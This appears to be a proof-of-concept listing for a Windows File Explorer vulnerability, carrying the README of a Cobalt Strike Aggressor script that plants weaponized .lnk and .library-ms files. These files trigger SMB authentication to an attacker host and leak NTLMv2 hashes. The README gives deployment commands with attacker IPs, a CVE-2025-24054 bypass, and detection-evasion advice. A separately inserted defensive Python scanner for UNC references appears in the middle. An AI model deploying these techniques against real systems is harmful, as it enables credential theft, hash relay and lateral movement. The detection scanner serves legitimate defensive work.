PoC details: 5829dae36abe3debe2051daa81cf44f885902b54

Source
Related vulnerability
Title: Microsoft Windows File Explorer information disclosure vulnerability (CVE-2025-50154)
Description: Microsoft Windows File Explorer is a file manager application from Microsoft Corporation of the United States. Microsoft Windows File Explorer has an information disclosure vulnerability. An attacker can exploit it to obtain sensitive information. The following products and versions are affected: Windows 10 Version 21H2 for ARM64-based Systems, Windows 10 Version 21H2 for x64-based Systems, Windows 11 Version 22H2 for A
Introduction
# LNK Weaponizer v2.0 - Cobalt Strike Aggressor Script

A comprehensive Cobalt Strike Aggressor script that weaponizes and executes malicious LNK files and Library-MS files for SMB NTLMv2-SSP hash disclosure. Includes CVE-2025-24054 bypass techniques.

## ⚠️ DISCLAIMER

**This tool is for educational and research purposes only. The author takes no responsibility for any misuse of this code. Use only on systems you own or have explicit permission to test.**

### Capturing NTLM Hashes
This script generates weaponized `.lnk` and `.library-ms` files that trigger SMB authentication to the operator’s host when opened.  
The leaked NTLMv2 hashes are **not shown in Cobalt Strike**, but must be captured with external tools such as **Responder**, **Impacket’s ntlmrelayx.py**, or **Inveigh** running on the attacker system.  
Once collected, the hashes can be cracked with **Hashcat** or relayed for further lateral movement.  

## 🎯 Features

- **LNK File Weaponization**: Creates malicious shortcut files for NTLM hash capture
- **Library-MS File Creation**: Implements CVE-2025-24054 bypass technique
- **Right-Click Menu Integration**: Easy access through Cobalt Strike's beacon context menu
- **Command-Line Interface**: Direct commands for automation and scripting
- **Interactive Dialogs**: User-friendly parameter input
- **Quick Deployment**: Pre-configured settings for rapid deployment
- **Global Configuration**: Easy customization of default settings

## 📁 Project Structure

```
cobalt-strike-aggressor/
├── lnk_weaponizer.cna           # Main Aggressor script (v2.0)
├── standalone_lnk_weaponizer.ps1 # Standalone PowerShell version
├── README.md                    # This documentation
├── INSTALL.md                   # Installation and setup guide
└── examples/
    ├── usage_scenarios.md       # Practical usage examples
    └── sample_targets.csv       # Sample batch operation file
```

## 🚀 Installation

1. Copy `lnk_weaponizer.cna` to your Cobalt Strike Aggressor scripts directory
2. Load the script in Cobalt Strike:
   - Go to `Cobalt Strike` → `Script Manager`
   - Click `Load` and select `lnk_weaponizer.cna`
3. The script will automatically initialize and show available commands

## 📖 Usage

### Right-Click Menu Options

Right-click on any beacon in Cobalt Strike to access:

1. **Create LNK File**: Interactive dialog for custom LNK creation
2. **Create Library-MS File**: Interactive dialog for Library-MS creation (CVE-2025-24054 bypass)
3. **Quick LNK (Default Settings)**: Fast LNK deployment with preset values
4. **Quick Library-MS (Default Settings)**: Fast Library-MS deployment with preset values

### Command-Line Commands

#### LNK File Commands
```bash
# Create LNK file with custom parameters
lnk_create <path> <ip> <share> <file>

# Example
lnk_create C:\Temp 192.168.1.10 share payload.exe
```

#### Library-MS File Commands
```bash
# Create Library-MS file with custom parameters
library_create <path> <ip> <share>

# Example
library_create C:\Temp 10.10.14.22 share
```

#### Quick Commands
```bash
# Use default settings
lnk_quick
library_quick

# Show help
lnk_help
```

## 🔧 Configuration

### Default Settings

The script uses these configurable default values:
- **IP**: `192.168.1.10`
- **Share**: `share`
- **Path**: `C:\Temp`

### Customizing Defaults

Edit the global variables in `lnk_weaponizer.cna`:

```cna
global('$default_ip $default_share $default_path');
$default_ip = "192.168.1.10";
$default_share = "share";
$default_path = "C:\\Temp";
```

## 🎯 How It Works

### LNK File Technique
1. **PowerShell Script Generation**: Creates a PowerShell script that generates the malicious LNK file
2. **LNK File Creation**: Uses the Windows Shell COM object to create a shortcut pointing to a remote SMB location
3. **Icon Triggering**: Forces Explorer to fetch the PE icon from the remote binary, triggering NTLM authentication
4. **Hash Capture**: The NTLMv2-SSP hash is captured when the user interacts with the file

### Library-MS Technique (CVE-2025-24054 Bypass)
1. **XML Generation**: Creates a Library-MS XML file with a UNC path reference
2. **File Creation**: Generates the `.library-ms` file in the target directory
3. **User Interaction**: When the user double-clicks the Library-MS file, Windows attempts to access the UNC path
4. **Authentication Trigger**: SMB authentication is triggered, capturing the NTLM hash

### Technical Details

Both techniques create files that:
- Point to remote SMB locations
- Trigger authentication when accessed
- Bypass common security controls
- Provide reliable hash capture
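
A defender-side counterpart to the two techniques above, added here as an example and not part of the LNK Weaponizer project: a triage scanner that flags `.lnk` and `.library-ms` files whose embedded strings reference a UNC host outside an allowlist of known file servers. The `.library-ms` XML namespace and the MS-SHLLINK header magic are Microsoft's published values; the regex, the allowlist logic, the file name `scan_unc_refs.py` and the two fixtures (which use the 192.0.2.0/24 documentation address range) are constructed for this example.

```python
"""Triage scanner for shortcut-style files that reference remote UNC paths.

Added example, not part of the LNK Weaponizer project. Fixtures at the bottom
are constructed and use the 192.0.2.0/24 documentation address range.
"""
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

# \\host\share[\more...]: host in group 1, the whole path in group 0.
UNC_RE = re.compile(r'\\\\([A-Za-z0-9][A-Za-z0-9.\-]*)((?:\\[^\\\s<>"|?*\x00]+)+)')

# Namespace of Windows Library Description (.library-ms) documents.
LIBRARY_NS = "{http://schemas.microsoft.com/windows/2009/library}"

# MS-SHLLINK ShellLinkHeader: HeaderSize 0x4C followed by LinkCLSID
# 00021401-0000-0000-C000-000000000046 in little-endian wire form.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "00000000" "c0000000" "00000046")


def unc_refs_from_text(text):
    """Return (host, full_unc_path) pairs for every UNC reference in text."""
    return [(m.group(1), m.group(0)) for m in UNC_RE.finditer(text)]


def unc_refs_from_lnk(data):
    """String-scan a shortcut for UNC paths (icon location, working dir, net name).

    Shortcut strings are UTF-16LE when the IsUnicode flag is set and ANSI
    otherwise, so both decodings are tried. This is triage, not a structural
    MS-SHLLINK parse.
    """
    refs = set()
    for encoding in ("utf-16le", "latin-1"):
        refs.update(unc_refs_from_text(data.decode(encoding, errors="ignore")))
    return sorted(refs)


def unc_refs_from_library_ms(text):
    """Collect UNC locations from a .library-ms document.

    <url> elements are the declared locations; the raw text is scanned too so a
    UNC placed elsewhere in the XML is not missed.
    """
    refs = set(unc_refs_from_text(text))
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return sorted(refs)
    for url in root.iter(LIBRARY_NS + "url"):
        refs.update(unc_refs_from_text(url.text or ""))
    return sorted(refs)


def hosts_off_allowlist(refs, allowed_hosts):
    """Hosts referenced in refs that are not allowlisted (case-insensitive)."""
    allowed = {h.lower() for h in allowed_hosts}
    return sorted({host for host, _ in refs if host.lower() not in allowed})


def scan_bytes(name, data, allowed_hosts=()):
    """Return (refs, flagged_hosts) for one file's content, dispatching on extension."""
    lower = name.lower()
    if lower.endswith(".library-ms"):
        refs = unc_refs_from_library_ms(data.decode("utf-8", errors="ignore"))
    elif lower.endswith(".lnk") and data.startswith(LNK_MAGIC):
        refs = unc_refs_from_lnk(data)
    else:
        refs = []
    return refs, hosts_off_allowlist(refs, allowed_hosts)


def scan_directory(root, allowed_hosts=()):
    """Walk root; return [(path, flagged_hosts)] for files pointing off-allowlist."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in (".lnk", ".library-ms"):
            _, flagged = scan_bytes(path.name, path.read_bytes(), allowed_hosts)
            if flagged:
                findings.append((str(path), flagged))
    return findings


# Constructed fixture: a .library-ms fragment whose only location is a UNC share.
SAMPLE_LIBRARY_MS = """<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\\\192.0.2.10\\share</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# Constructed fixture: header magic padded to the 76-byte header size, then a
# UTF-16LE UNC string. Enough to exercise the scanner; not a valid shortcut.
SAMPLE_LNK = LNK_MAGIC + b"\x00" * 56 + "\\\\192.0.2.10\\share\\payload.exe".encode("utf-16le")


if __name__ == "__main__":
    # Usage: python scan_unc_refs.py <directory> [allowed_host ...]
    for found_path, hosts in scan_directory(sys.argv[1], sys.argv[2:]):
        print(f"[!] {found_path} references non-allowlisted host(s): {', '.join(hosts)}")
```

Running it over a shared folder such as a public desktop with the organisation's real file servers as the allowlist surfaces exactly the artifacts the "How It Works" steps describe: a shortcut whose icon or target lives on an unknown host, or a library file whose location is a UNC share. Because the `.lnk` side is a string scan rather than a field-by-field MS-SHLLINK parse, a full parser that walks LinkFlags and StringData would reduce false negatives on shortcuts whose strings are split across blocks.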

## 📊 Output Format

The script provides detailed logging:

```
[+] Creating LNK file on TARGET-COMPUTER
[+] Target UNC: \\192.168.1.10\share\payload.exe
[+] Local Path: C:\Temp
[+] LNK weaponization completed
[!] Wait for user to click the LNK file to capture NTLM hash
```

## 🛡️ Security Considerations

### Detection Avoidance
- Use legitimate-looking share names and paths
- Consider timing of deployment to avoid detection
- Monitor for security tool alerts
- Library-MS technique provides additional evasion

### Operational Security
- Use dedicated SMB servers for hash collection
- Implement proper logging and monitoring
- Follow your organization's red team procedures
- Document all testing activities

### Legal Compliance
- Ensure proper authorization before testing
- Document all testing activities
- Respect scope and boundaries

## 🔍 Troubleshooting

### Common Issues

1. **Beacon Not Found**
   - Ensure target computer has an active beacon
   - Check computer name spelling in batch operations

2. **Permission Denied**
   - Verify write permissions on target path
   - Check UAC settings on target system

3. **PowerShell Execution Policy**
   - The script uses `bpowershell()` to handle restrictions
   - Ensure PowerShell is available on the target

### Debug Mode

Enable verbose output by modifying the script:
```cna
# Add debug logging
blog($bid, "[DEBUG] Executing command: " . $command);
```

## 📝 Examples

### Scenario 1: LNK File Deployment
```bash
# Create LNK file on specific target
lnk_create C:\Users\Public\Desktop 10.0.0.5 public malware.exe
```

### Scenario 2: Library-MS Bypass
```bash
# Create Library-MS file for CVE-2025-24054 bypass
library_create C:\Users\Public\Desktop 192.168.1.100 share
```

### Scenario 3: Quick Attack
```bash
# Use default settings for rapid deployment
lnk_quick
library_quick
```

## 🔬 Advanced Techniques

### CVE-2025-24054 Bypass
The Library-MS technique implements a bypass for CVE-2025-24054 by:
- Using Library-MS file format instead of traditional LNK files
- Leveraging Windows Library system for authentication triggers
- Providing additional evasion capabilities

### Evasion Strategies
- **File Naming**: Use realistic names and extensions
- **Path Selection**: Deploy in common user directories
- **Timing**: Execute during normal business hours
- **Rotation**: Vary SMB server IPs and share names

## 🤝 Contributing

1. Fork the repository
2. Create a feature branch
3. Make your changes
4. Test thoroughly
5. Submit a pull request

## 📄 License

This project is provided as-is for educational purposes. Use responsibly and in accordance with applicable laws and regulations.

## 🙏 Acknowledgments

- Cobalt Strike team for the Aggressor framework
- Red team community for testing and feedback
- Security researchers who pioneered LNK-based attacks
- Contributors to CVE-2025-24054 research

---

**Remember: Always obtain proper authorization before testing on any system.**
File snapshot

```
[4.0K] /data/pocs/5829dae36abe3debe2051daa81cf44f885902b54
├── [4.0K] examples
│   ├── [ 985] sample_targets.csv
│   └── [8.7K] usage_scenarios.md
├── [6.1K] INSTALL.md
├── [9.9K] lnk_weaponizer.cna
├── [7.4K] README.md
└── [8.8K] standalone_lnk_weaponizer.ps1

1 directory, 6 files
```